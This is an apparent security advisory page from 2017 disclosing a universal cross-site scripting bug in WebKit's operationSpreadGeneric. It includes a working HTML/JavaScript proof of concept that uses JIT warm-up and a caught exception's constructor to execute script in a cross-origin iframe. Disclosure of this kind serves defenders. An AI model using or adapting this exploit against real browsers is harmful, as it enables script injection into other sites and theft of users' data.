WebKit operationSpreadGeneric Universal Cross Site Scripting

Published
Credit
Risk
2017.04.19
lokihardt
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

WebKit: UXSS via operationSpreadGeneric




Once a spread operation is optimized, the function |operationSpreadGeneric| will be called from then on. But operationSpreadGeneric's trying to get a JSGlobalObject from the argument of a spread operation.

It seems that that optimization is not implemented to the release version of Safari yet.

Tested on the Nighly 10.0.2(12602.3.12.0.1, <a href="https://crrev.com/210957" title="" class="" rel="nofollow">r210957</a>)

PoC:
<body>
<script>

'use strict';

function spread(a) {
return [...a];
}

let arr = Object.create([1, 2, 3, 4]);
for (let i = 0; i < 0x10000; i++) {
spread(arr);
}

let f = document.body.appendChild(document.createElement('iframe'));
f.onload = () => {
f.onload = null;

try {
spread(f.contentWindow);
} catch (e) {
e.constructor.constructor('alert(location)')();
}
};

f.src = '<a href="https://abc.xyz/';" title="" class="" rel="nofollow">https://abc.xyz/';</a>

</script>
</body>


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com